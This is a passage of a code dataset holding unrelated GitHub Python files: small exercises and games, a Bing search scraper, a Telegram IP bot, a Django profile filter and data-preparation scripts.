json_send(to_send)\n\n\n","repo_name":"jhaysonj/GRIS-PS-2022","sub_path":"criptografia/encoding_challenge.py","file_name":"encoding_challenge.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33973665105","text":"'''\r\n1 - Listar los personajes ordenados por altura\r\n2 - Mostrar el personaje mas alto de cada genero\r\n3 - Ordenar los personajes por peso\r\n4 - Armar un buscador de personajes \r\n5 - Exportar lista personajes a CSV\r\n6 - Salir\r\n'''\r\nimport funciones\r\n\r\ndef starwars_app():\r\n lista_personajes = funciones.cargar_json(\"data.json\")\r\n \r\n while(True):\r\n print(\"1 - Listar los personajes ordenados por altura\\n2 - Mostrar el personaje mas alto de cada genero\\n3 - Ordenar los personajes por peso\\n4 - Armar un buscador de personajes\\n5 - Exportar lista personajes a CSV\\n6 - Salir\\n\")\r\n respuesta = input()\r\n if(respuesta==\"1\"):\r\n funciones.imprimir_personajes(lista_personajes, 'height')\r\n elif(respuesta==\"2\"):\r\n genero = input('Ingrese el genero del personaje: (male, n/a, female)\\n> ')\r\n if genero != 'male' and genero != 'n/a' and genero != 'female':\r\n genero = input('Ingrese el genero del personaje: (male, n/a, female)\\n> ')\r\n personaje = funciones.buscar_personaje_mas_alto_genero(lista_personajes, genero)\r\n personaje = '\\nName: {0}\\nHeight: {1}\\nMass: {2}\\nGender: {3}\\n'.format(personaje['name'], personaje['height'] ,personaje['mass'], personaje['gender'])\r\n print(personaje)\r\n elif(respuesta==\"3\"):\r\n funciones.imprimir_personajes(lista_personajes, 'mass')\r\n elif(respuesta==\"4\"):\r\n personaje = input('Ingrese el nombre del personaje a buscar: \\n> ')\r\n funciones.buscar_personaje(lista_personajes, personaje)\r\n elif(respuesta==\"5\"):\r\n print(\"5 - Exportar lista personajes a CSV\\n\")\r\n elif(respuesta==\"6\"):\r\n break\r\n\r\n\r\nstarwars_app()\r\n\r\n","repo_name":"gabrielhnunez39166/Programacion-y-Laboratorio-I---1H","sub_path":"PP_STARWARS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24985134844","text":"'url handlers'\r\n\r\nimport re, time, json, logging, hashlib, base64, asyncio\r\nfrom coroweb import get, post\r\nfrom models import User, Comment, Blog, next_id\r\n#处理首页URL的函数:\r\n# @get('/')\r\n# async def index(request):\r\n# \tusers = await User.findAll()\r\n# \treturn {\r\n# \t\t'__template__' : 'test.html',\r\n# \t\t'users' : users\r\n# \t}\r\n\r\n@get('/')\r\nasync def index(request):\r\n\tsummary = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.'\r\n\tblogs = [\r\n\t\tBlog(id = '1', name = 'Test Blog', summary = summary, created_at = time.time()-120),\r\n\t\tBlog(id = '2', name = 'Something New', summary = summary, created_at = time.time()-3600),\r\n\t\tBlog(id = '3', name ='Learn Swift', summary = summary, created_at = time.time()-7200)\r\n\t]\r\n\r\n\treturn { '__template__' : 'blogs.html', 'blogs' : blogs}","repo_name":"chen358805035/python","sub_path":"day8/awesome-python3-webapp/www/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71634399768","text":"'''\nSquare Root of Integer\nProblem Description\n\nGiven an integer A.\n\nCompute and return the square root of A.\n\nIf A is not a perfect square, return floor(sqrt(A)).\n\nDO NOT USE SQRT FUNCTION FROM STANDARD LIBRARY.\n\nNOTE: Do not use sort function from standard library. Users are expected to solve this in O(log(A)) time.\n\n\n\nProblem Constraints\n0 <= A <= 1010\n\n\n\nInput Format\nThe first and only argument given is the integer A.\n\n\n\nOutput Format\nReturn floor(sqrt(A))\n\n\n\nExample Input\nInput 1:\n\n 11\nInput 2:\n\n 9\n\n\nExample Output\nOutput 1:\n\n 3\nOutput 2:\n\n 3\n\n\nExample Explanation\nExplanation:\n\n When A = 11 , square root of A = 3.316. It is not a perfect square so we return the floor which is 3.\n When A = 9 which is a perfect square of 3, so we return 3.\n\n\n\n APPROACH:\n here trick is that we know that sqrt of A can lie between 1 to A//2\n idea is to apply binary search for possible sqrts and manipulate on basis of sqrt * sqrt\n but this would only work for perfect sqrts how we deal with not perfect squares ???\n\n notice here we will specify if mid * mid == A then return mid\n\n here thing to notice is that if lets say A = 9 and A = 11\n so for both floor(sqrt) would be 3\n\n so lets say if mid * mid < A then we can store it as possible answer and try to get bigger hence start would be mid + 1\n\n'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport sys\ndef sqrt( A):\n if (A == 0 or A == 1) :\n return A \n start = 1\n end = A//2\n ans = sys.maxsize\n while start <= end:\n mid = (start + end)//2\n \n if mid * mid > A:\n end = mid -1\n elif mid * mid <= A:\n ans = mid\n start = mid + 1\n return ans \n\n\nprint(sqrt(8))","repo_name":"GammaWind/dsa","sub_path":"binary search/squareRootfloor.py","file_name":"squareRootfloor.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35220313157","text":"\r\nfor i in range(int(input())):\r\n l1,l2,s1,p=[],[],{},0\r\n for j in range(int(input())):\r\n s=[int(k) for k in input().split(' ')]\r\n for l in range(len(s)):\r\n if p==0:\r\n s1[l]=s[l]\r\n else:\r\n s1[l]+=s[l] \r\n p+=1\r\n l1.append(sum(s))\r\n l2,f=[g for g in s1.values()],0\r\n for h in l1:\r\n if h not in l2:\r\n print('Impossible')\r\n f=1\r\n break\r\n if f==0: print('Possible')\r\n\r\n \r\n\r\n\r\n","repo_name":"meena-shiv/Hackerrank-solutions","sub_path":"orgnise containers ball.py","file_name":"orgnise containers ball.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3547863197","text":"from xml.etree import ElementTree\nfrom urllib.parse import quote\nfrom selenium import webdriver\nimport requests\nimport json\nimport pymongo\nfrom multiprocessing import Pool\n\nclient = pymongo.MongoClient()\ndb = client.bing\ntasks = db.tasks\n\n\ndef bing_search(session, query):\n while True:\n try:\n response = session.get(\"http://cn.bing.com/search?format=rss&ensearch=1&FORM=QBLH&q=%s\" % quote(query), headers={\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\",\n # \"Cookie\": \"DUP=Q=cyf2E319RplzT70uHnlIqw2&T=368615744&A=2&IG=FC18BC5497064931959EE9F6DA0B10D2; MUID=1AE2679CCD1F6E4533796B00C91F6D54; SRCHD=AF=NOFORM; MSCC=1; MUIDB=1AE2679CCD1F6E4533796B00C91F6D54; _EDGE_S=mkt=zh-cn&SID=24BE194AE40368593F351431E55B692C; _FP=hta=on; SerpPWA=reg=1; ULC=P=F0B3|1:1&H=F0B3|1:1&T=F0B3|1:1; SRCHHPGUSR=CW=1280&CH=689&DPR=2&UTC=480&WTS=63696304825; ipv6=hit=1560711627371&t=4; SRCHUSR=DOB=20190614&T=1560708028000; ENSEARCH=BENVER=0; _SS=SID=24BE194AE40368593F351431E55B692C&bIm=525816&HV=1560708033; SRCHUID=V=2&GUID=E36C49C8C20D43F6804EC01055B2921D&dmnchg=1; SNRHOP=I=&TS=\",\n }, timeout=5)\n # print(response.content)\n body = response.content\n tree = ElementTree.fromstring(response.content)\n # tree = ElementTree.fromstring(driver.page_source)\n x = tree.find('item')\n texts = []\n for it in tree.find('channel').findall('item'):\n texts.append(it.find('description').text)\n break\n except:\n pass\n return texts, body\n\n\ndef get_new_session():\n print(\"get new session\")\n options = webdriver.ChromeOptions()\n options.add_argument('--disable-extensions')\n options.add_argument('--headless')\n driver = webdriver.Chrome(chrome_options=options)\n\n session = requests.session()\n driver.get(\"https://cn.bing.com/search?q=hellp&qs=n&form=QBLH&sp=-1&pq=&sc=0-0&sk=&cvid=36D87CF616344F2EB887E777C3E0BB2F\")\n print(driver.get_cookies())\n for cookie in driver.get_cookies():\n session.cookies.set(cookie[\"name\"], cookie[\"value\"], domain=cookie[\"domain\"], path=cookie[\"path\"])\n\n driver.quit()\n return session\n\ncount = 0\nsession = get_new_session()\n\n\ndef crawl_one(task, count):\n texts, body = bing_search(session, task[\"query\"])\n\n failed_time = 0\n while len(texts) == 0:\n print(\"zero length\")\n texts, body = bing_search(session, task[\"query\"])\n failed_time += 1\n if failed_time > 4:\n break\n print(task)\n print(count, task[\"query\"], len(texts))\n tasks.update({'_id': task[\"_id\"]}, {\n '$set': {\n \"is_crawled\": True,\n \"body\": body,\n \"answer_count\": len(texts)\n },\n })\n\npool = Pool(10)\n\nfor task in tasks.find({\"is_crawled\": False}):\n pool.apply_async(crawl_one, args=(task, count))\n # crawl_one(task, count)\n count += 1\n\npool.close()\npool.join()\n","repo_name":"nladuo/bing_search_crawler","sub_path":"bing_crawler.py","file_name":"bing_crawler.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"12342885445","text":"#%%\nimport pandas as pd\ntranslate_dict = {\"Scientific Publications\":\"論文\",\n \"Corresponding Author\":\"責任著者\",\n \"First Author\":\"筆頭著者\",\n \"Last Author\":\"最終著者\",\n \"Patents\":\"知財・特許\"} \ndef format_title(title):\n return title.replace(\";\",\",\")\n\ndef format_date(date,n=8): # change format if n < 8\n date = str(date)\n formatted_date = date[:4]+\"/\"+date[4:6]+\"/\"+date[6:8]\n formatted_date = formatted_date.replace(\"X\",\"\")\n return formatted_date\n\n\ndef format_authors(authors):\n sorted_authors = \"\"\n for a in authors.split(\" and \"):\n try:\n last,first = a.split(\", \")\n sorted_authors += first + \" \" + last + \", \"\n except ValueError:\n sorted_authors += a + \", \"\n sorted_authors = sorted_authors[:-2] \n return sorted_authors\n\ndef translate(txt):\n for k,v in translate_dict.items():\n txt = txt.replace(k,v)\n return txt \n\nfor LANG in [\"\",\"_JP\"]:\n #### Main Articles #####\n df = pd.read_csv(f\"../achievements/Publications.csv\", index_col = 0) # {LANG}\n df = df.sort_values(by = [\"type\",\"year\"], ascending = [True, False]).fillna(\"\")\n N = df.shape[0]\n num_original = df[df[\"type\"]==\"original\"].shape[0]\n num_corresponding = df[\"author\"].str.contains(\"Ooka*\").sum() \n num_first = df[\"ID\"].str.contains(\"Ooka\").sum()\n out_html = f\"(Corresponding Author: {num_corresponding}, First Author: {num_first})
    \\n\\n\"\n\n out_html += f\"\\n\\t

    Original Articles

      \\n\"\n year_header = \"2030\"\n\n for i in range(N):\n data = df.iloc[i].astype(str)\n ID, authors, journal, year, volume, pages, doi, notes, ENTRYTYPE, type, title, fullame, abbrv, status = data\n if year < year_header:\n year_header = year\n out_html += \"\\t

      {}

      \\n\".format(year_header)\n authors = format_authors(authors)\n if pages == \"\": # must be not accepted yet\n volume = status\n pages = doi\n \n out_html += f\"\\t\\t
    1. {authors} \\\"{title}\\\", {journal}, {year}, {volume}, {pages}.
      \\n\\n\"\n if i == num_original-1:\n out_html += \"\\t
    \\n\\n\"\n out_html += f\"

    Review Articles

      \\n\"\n out_html += \"\\t
    \\n\\n\"\n\n #### Other Articles (Non Peer Reviewed) #####\n out_html += f\"

    Other Articles (Non Peer Reviewed)

      \\n\"\n df = pd.read_csv(f\"../achievements/Non_Peer_Reviewed{LANG}.csv\")\n df = df.sort_values(by = [\"Date\"], ascending = [False]).fillna(\"\")\n N = df.shape[0]\n for i in range(N):\n data = df.iloc[i].astype(str)\n title, authors, journal, year, volume, pages, URL, type, date, doi, notes = data\n title = format_title(title)\n authors = format_authors(authors)\n if pages != \"\": # it has \"proper\" bibliography information:\n out_html += f\"\\t\\t
    1. {authors} \\\"{title}\\\", {journal}, {year}, {volume}, {pages}.
      \\n\\n\"\n if pages == \"\": # it must have a URL\n out_html += f\"\\t\\t
    2. {authors} \\\"{title}\\\", {journal} (URL).
      \\n\\n\"\n out_html += \"\\t
    \\n\\n\"\n\n\n\n out_html = out_html.replace(\"MoS$_2$\", \"MoS2\").replace(\"CO$_2$\", \"CO2\").replace(\"{\\`e}\",\"è\").replace(\"MnO$_2$\", \"MnO2\")\n if LANG == \"_JP\":\n out_html = translate(out_html)\n\n with open(f\"../contents/publications{LANG}_contents.html\", \"w\", encoding=\"utf-8\") as f:\n f.write(out_html)\n","repo_name":"HideshiOoka/Homepage","sub_path":"python/make_publications_contents.py","file_name":"make_publications_contents.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30919422884","text":"import dotenv\ndotenv.load_dotenv()\nimport os\nfrom logger import LOG\n\nfrom telegram.ext import Updater, InlineQueryHandler, CommandHandler, MessageHandler\nfrom telegram.ext.filters import Filters\nimport requests\n\n\nMY_CHAT_ID = int(os.getenv('MY_CHAT_ID', 0))\nTELEGRAM_BOT_ID = os.getenv('TELEGRAM_BOT_ID', '')\n\nGET_IP_URL = 'https://api.ipify.org'\nADMINS = [MY_CHAT_ID]\n\ndef ip(bot, update):\n chat_id = update.message.chat_id\n LOG.info(\"ip request: %s\", chat_id)\n if chat_id in ADMINS:\n # bot.send_photo(chat_id=chat_id, photo=url)\n try:\n ip = requests.get(GET_IP_URL).text\n bot.send_message(chat_id=chat_id, text=ip)\n except Exception as e:\n LOG.error(e)\n \ndef msg_handler(bot, update):\n chat_id = update.message.chat_id\n message = update.message.text\n\n LOG.info('message from %s: \"%s\"', chat_id, message)\n\n if chat_id in ADMINS:\n bot.send_message(chat_id=chat_id, text=message)\n else:\n bot.send_message(chat_id=chat_id, text='Вас нет в списке приглашенных.')\n \n\ndef main():\n updater = Updater(TELEGRAM_BOT_ID)\n dp = updater.dispatcher\n dp.bot.send_message(chat_id=MY_CHAT_ID, text='Я запустился!')\n dp.add_handler(CommandHandler('ip', ip))\n dp.add_handler(MessageHandler(Filters.all, msg_handler))\n updater.start_polling()\n updater.idle()\n\nif __name__ == '__main__':\n main()","repo_name":"Sanek1710/tgbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71660677207","text":"import tensorflow as tf\nimport numpy as np\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nflattenDim = 28 * 28\nTRAINING_SIZE = len(train_images)\nTEST_SIZE = len(test_images)\n\ntrainImages = np.reshape(train_images, (TRAINING_SIZE, flattenDim))\ntestImages = np.reshape(test_images, (TEST_SIZE, flattenDim))\nprint(type(trainImages[0][0]))\ntrainImages = trainImages.astype(np.float32)\ntestImages = testImages.astype(np.float32)\nprint(type(trainImages[0][0]))\ntrainImages /= 255\ntestImages /= 255\nNUM_DIGITS = 10\ntrainLabels = to_categorical(train_labels, NUM_DIGITS)\ntestLabels = to_categorical(test_labels, NUM_DIGITS)\nprint(trainImages[0])\nprint(trainLabels[0])","repo_name":"jsw7524/pykt0803","sub_path":"Demo69.py","file_name":"Demo69.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72265436569","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\n\nfrom collections import defaultdict\n\nfrom groups.models import Group\nfrom courses.models import Course\nfrom users.models import UserProfile\nfrom users.model_user_status import UserStatus\n\nimport django_filters\nimport logging\n\nlogger = logging.getLogger('django.request')\n\n\nclass CustomMethodFilter(django_filters.Filter):\n def __init__(self, *args, **kwargs):\n self.field_class = kwargs.pop('field_class', forms.Field)\n\n super(CustomMethodFilter, self).__init__(*args, **kwargs)\n\n\nclass UserProfileFilter(django_filters.FilterSet):\n courses = CustomMethodFilter(label=_(u'kurs'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n groups = CustomMethodFilter(label=_(u'gruppa'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n user_status_activity = CustomMethodFilter(label=_(u'status_studenta'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n user_status_filial = CustomMethodFilter(label=_(u'filial'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n user_status_admission = CustomMethodFilter(label=_(u'status_postupleniya'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n\n STATUS_SQL_JOIN = 'LEFT OUTER JOIN users_userprofile_user_status {0} ' \\\n 'ON (users_userprofile.id = {0}.userprofile_id)'\n STATUS_SQL_PREFIX = 'UUUS'\n STATUS_SQL_EXTRA = '''\n users_userprofile.id IN (\n SELECT DISTINCT\n users_userprofile.id\n FROM users_userprofile\n {0}\n WHERE {1}\n )\n '''\n\n def empty_filter(self, qs, value):\n return qs\n\n # def filter_course(self, qs, value):\n # if not hasattr(self, '_qs'):\n # if value and qs:\n # return qs.filter(user__group__course__id__in=value).distinct()\n # return qs\n #\n # def filter_group(self, qs, value):\n # if not hasattr(self, '_qs'):\n # if value and qs:\n # return qs.filter(user__group__id__in=value).distinct()\n # return qs\n\n def set(self):\n for field in self.filters:\n self.filters[field].field.label = u'{0}'.format(self.filters[field].field.label)\n\n self.courses_qs = Course.objects.filter(is_active=True)\n courses_choices = [(course.id, course.name) for course in self.courses_qs]\n self.filters['courses'].field.choices = tuple(courses_choices)\n\n self.groups_qs = Group.objects.all()\n groups = [(group.id, group.name) for group in self.groups_qs]\n self.filters['groups'].field.choices = tuple(groups)\n\n activity_choices = []\n filial_choices = []\n admission_choices = []\n for status in UserStatus.objects.exclude(type__isnull=True):\n if status.type == 'activity':\n activity_choices.append((status.id, status.name))\n elif status.type == 'filial':\n filial_choices.append((status.id, status.name))\n elif status.type == 'admission':\n admission_choices.append((status.id, status.name))\n\n self.filters['user_status_activity'].field.choices = tuple(activity_choices)\n self.filters['user_status_filial'].field.choices = tuple(filial_choices)\n self.filters['user_status_admission'].field.choices = tuple(admission_choices)\n\n def get_extra_sql_statuses(self):\n status_join = []\n status_where = []\n status_type_counter = 0\n for filter_name in [u'user_status_activity', u'user_status_filial', u'user_status_admission']:\n if filter_name in self.data:\n status_type_counter += 1\n table_name = self.STATUS_SQL_PREFIX + str(status_type_counter)\n\n status_join.append(self.STATUS_SQL_JOIN.format(table_name))\n status_where.append(\n '({0}.userstatus_id = {1})'\n .format(\n table_name, ' OR {0}.userstatus_id = '.join(\n self.data.getlist(filter_name)\n ).format(table_name)\n )\n )\n\n if status_type_counter:\n return self.STATUS_SQL_EXTRA.format(' '.join(status_join), ' AND '.join(status_where))\n return ''\n\n @property\n def qs(self):\n if not hasattr(self, '_qs'):\n qs = super(UserProfileFilter, self).qs\n if not hasattr(self, '_users_info'):\n qs_filter = {}\n\n if u'courses' in self.data:\n qs_filter['user__group__course__id__in'] = self.data.getlist(u'courses')\n if u'groups' in self.data:\n qs_filter['user__group__id__in'] = self.data.getlist(u'groups')\n\n profiles_info = qs.filter(**qs_filter).values(\n 'id',\n 'user__id',\n 'user__username',\n 'user__email',\n 'user__last_name',\n 'user__first_name',\n 'user_status__id',\n 'user_status__name',\n 'user_status__color'\n )\n\n extra_sql = self.get_extra_sql_statuses()\n if extra_sql:\n profiles_info = profiles_info.extra(where=[extra_sql])\n\n users_info = {}\n for info in profiles_info:\n if info['user__id'] not in users_info:\n users_info[info['user__id']] = defaultdict(dict)\n users_info[info['user__id']]['id_profile'] = info['id']\n users_info[info['user__id']]['username'] = info['user__username']\n users_info[info['user__id']]['email'] = info['user__email']\n users_info[info['user__id']]['last_name'] = info['user__last_name']\n users_info[info['user__id']]['first_name'] = info['user__first_name']\n if info['user_status__id']:\n users_info[info['user__id']]['statuses'][info['user_status__id']] = {\n 'name': info['user_status__name'],\n 'color': info['user_status__color'],\n }\n self.users_info = users_info\n return self._qs\n\n class Meta:\n model = UserProfile\n fields = ['courses', 'groups', 'user_status_filial', 'user_status_activity', 'user_status_admission']\n","repo_name":"znick/anytask","sub_path":"anytask/users/model_user_profile_filter.py","file_name":"model_user_profile_filter.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"42959647679","text":"from turtle import Turtle, Screen\nfrom cars import Car, STARTING_MOVE_DISTANCE\nimport time\nimport random\nfrom player import Player\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(600,600)\nscreen.bgcolor('white')\nscreen.tracer(0)\n\nplayer = Player()\ncar_manager = Car()\nscoreboard = Scoreboard(position=(0,270))\nx_boundaries = -300\n\n\nscreen.listen()\nscreen.onkey(player.advance, 'Up')\n\ngame_is_on = True\n\n\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n\n car_manager.create_cars()\n car_manager.moving()\n\n if player.ycor() > 280:\n scoreboard.update_score()\n player.reseting_the_game()\n car_manager.level_up()\n\n for car in car_manager.all_cars:\n if car.distance(player) < 20:\n game_is_on = False\n scoreboard.game_over()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nscreen.exitonclick()","repo_name":"nicolasvilleneuve/TurtleFrogger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21278651179","text":"############### prob link : https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) < 1 :\n return 0\n min = prices[0]; r= 0\n for i in prices:\n if i < min:\n min = i\n r = max(r, i - min)\n return r\n \n","repo_name":"TAUIL-Abd-Elilah/LeetCode","sub_path":"easy/121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28219892130","text":"import streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import Colormap\n#from matplotlib.colors import SymLogNorm\n\nhide = \"\"\"\n \n \"\"\"\n\nst.markdown(hide, unsafe_allow_html=True)\n\nif 'old_num_pts' not in st.session_state:\n st.session_state['old_num_pts'] = -1\n\ndef my_kernel(x, y, pt, kernel='poly', degree = 3, gamma = 1):\n if kernel == 'poly':\n return np.power(np.dot(np.array([xx,yy]),pt)+1,degree)\n elif kernel == 'rbf':\n dist = np.array([xx,yy])-pt\n return np.exp(-gamma*np.dot(dist,dist))\n elif kernel == 'sigmoid':\n return np.tanh(gamma *np.dot(np.array([xx,yy]),pt)+1)\n\ncol1, col2 = st.columns([2,3])\n\nwith col1:\n kernel = st.selectbox('Kernel to use:', \n ('Polynomial', 'Radial basis function', 'Sigmoid'))\n \n if kernel == 'Polynomial':\n kernel = 'poly'\n elif kernel == 'Radial basis function':\n kernel = 'rbf'\n elif kernel == 'Sigmoid':\n kernel = 'sigmoid'\n\n num_pts = st.slider('Number of instances:', min_value = 1, max_value = 7)\n degree = 1\n gamma = 1\n if kernel == 'poly':\n degree = st.slider('Degree:', min_value = 1, max_value = 5)\n else:\n gamma = st.slider('gamma:', min_value=0.1, max_value=2.0, step = 0.1)\n \n new_pts = st.button('New points')\n if (st.session_state['old_num_pts'] != num_pts or new_pts):\n st.session_state.pts = np.array(4*np.random.rand(num_pts,2)-2)\n st.session_state['old_num_pts'] = num_pts\n\n pts = st.session_state.pts\n\n tabularView = st.checkbox('Tabular view')\n if tabularView:\n numDivisions = st.slider('Number of values in each direction', min_value=7, max_value = 25, step = 6)\n \n\n\n\n\nwith col2:\n if not tabularView:\n XX = np.linspace(-3,3,50)\n YY = np.linspace(-3,3,50)\n ZZ = np.zeros([ len(YY), len(XX)])\n i=0\n for xx in XX:\n j=0\n for yy in YY:\n zz = 0\n for pt in pts:\n zz = zz + my_kernel(xx, yy, pt, kernel = kernel, gamma = gamma, degree=degree)\n ZZ[j,i]=zz\n j = j+1\n i=i+1\n fig, ax = plt.subplots()\n spread = np.max(ZZ)-np.min(ZZ)\n if spread > 10**3:\n if np.min(ZZ) < 0:\n log_levels = np.append(np.sort(-(10**np.arange(1,np.log10(-np.min(ZZ)), step = 1))), 0 )\n else:\n log_levels = []\n log_levels = np.append(log_levels, 10**np.arange(1, np.log10(np.max(ZZ))))\n CS = ax.contour(XX, YY, ZZ, levels=log_levels, colors='gray')\n else:\n CS = ax.contour(XX, YY, ZZ, colors='gray')\n ax.clabel(CS, inline=True, fontsize=10)\n if kernel == 'poly':\n ax.set_title('Polynomial with degree = '+ str(degree))\n elif kernel == 'rbf':\n ax.set_title('RBF with gamma = '+ str(gamma))\n elif kernel == 'sigmoid':\n ax.set_title('Sigmoid with gamma = '+ str(gamma))\n ax.set_aspect('equal', 'box')\n sns.scatterplot(x= pts[:,0],y =pts[:,1])\n plt.scatter(x= [0],y =[0], c = 'black', marker='+')\n\n st.pyplot(fig)\n \n else:\n \n XX = np.linspace(-3,3,numDivisions)\n YY = np.linspace(-3,3,numDivisions)\n ZZ = np.zeros([ len(YY), len(XX)])\n i=0\n for xx in XX:\n j=0\n for yy in YY:\n zz = 0\n for pt in pts:\n zz = zz + my_kernel(xx, yy, pt, kernel = kernel, gamma = gamma, degree=degree)\n ZZ[j,i]=zz\n j = j+1\n i=i+1\n ZZ = np.round(ZZ, 2)\n ZZ = pd.DataFrame(ZZ, \n index = ( 'y=%d' % i for i in np.round(YY,2)), \n columns= ( 'x=%d' % i for i in np.round(XX,2))\n )\n #ZZ.columns = np.round(XX,2)\n pdpts = pd.DataFrame(pts.transpose(), index = ['x','y'])\n st.caption(\"Instances\")\n st.write(pdpts)\n st.caption('''Kernel values for each (x,y) coordinate''')\n #st.write('''
    x
    ''', unsafe_allow_html=True)\n st.write(ZZ)\n #st.text(log_levels)","repo_name":"sdlauer/authored-streamlits","sub_path":"MachineLearning/Kernels.py","file_name":"Kernels.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41166856832","text":"import logging\nimport numpy as np\nfrom core.nlp.response_generator.product.base.base_response_generator import BaseResponseGenerator\n\n\nclass OYSMeaninglessInARowResponseGenerator(BaseResponseGenerator):\n def __call__(self):\n try:\n responses = self.__create_oys_after_meaningless_in_a_row()\n\n self.response_data['regular'] = responses\n\n return self.response_data\n except:\n logging.exception('')\n return self.response_data\n\n def __create_oys_after_meaningless_in_a_row(self):\n qr = [\n [\"okay!\"],\n [\"i see:)\"],\n [\"gotcha!\"],\n [\"right!\"],\n [\"alright!\"],\n ]\n oys = [\n [\"just let you know im always here\"],\n [\"you know i am always here for you ok?\"],\n [\"I love to be here for you\"],\n [\"it is always glad to talk to you\"],\n [\"it is always good feeling to listen to you\"]\n ]\n encourage = [\n [\"and you can tell me anything whenever you ready😋\"],\n [\"you know, you can come talk to me anytime you want, no rush😜\"],\n [\"take your time and please come back here whenever you ready🤗\"],\n [\"again, you just come talk to me whenever you want, never feel forced🤓\"],\n [\"i think you need little break now..just come back whenever you would like to😋\"]\n ]\n np.random.shuffle(qr)\n np.random.shuffle(oys)\n np.random.shuffle(encourage)\n return qr[0] + oys[0] + encourage[0]","repo_name":"rinigo/therapy_chatbot_jullie","sub_path":"core/nlp/response_generator/product/cct/OYS_Meaningless_In_A_Row_response_generator.py","file_name":"OYS_Meaningless_In_A_Row_response_generator.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12174004641","text":"\n# https://www.acmicpc.net/problem/1107 강의\n\n\nchannel = int(input())\nnum_broken = int(input())\nif num_broken > 0:\n brokens = list(map(int, input().split(' ')))\nelse:\n brokens = []\nbroken = [False] * 10\nfor x in brokens:\n broken[x] = True # marking broken number\n\n# bruteforce\ndef possible(c):\n if c == 0:\n if broken[0]:\n return 0\n return 1\n\n len_ = 0\n while c > 0:\n if broken[c % 10]:\n return 0\n len_ += 1\n c //= 10\n return len_\n\n\ndef solution():\n ans = abs(channel - 100)\n\n for i in range(1000000 + 1):\n c = i\n len_ = possible(c)\n if len_ > 0:\n press = abs(c - channel)\n if ans > len_ + press:\n ans = len_ + press\n\n return ans\n\nprint(solution())","repo_name":"nellaG/ps","sub_path":"baekjoon/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12143456828","text":"# Use pytorch_py3.8.8\n# Write train.csv and train_word_probabilities.csv to text files that JAVA program can read\n\nimport logging\nimport pandas as pd\nfrom gensim.corpora import Dictionary\n\nlogging.basicConfig(\n # filename='out.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s')\nlogger = logging.getLogger(__name__) \n\n\n# All_Beauty All_Beauty_sentence\n# AMAZON_FASHION AMAZON_FASHION_sentence\n# CDs_and_Vinyl CDs_and_Vinyl_sentence\n# Cell_Phones_and_Accessories Cell_Phones_and_Accessories_sentence\n# Digital_Music Digital_Music_sentence\n# Electronics Electronics_sentence\n# Industrial_and_Scientific 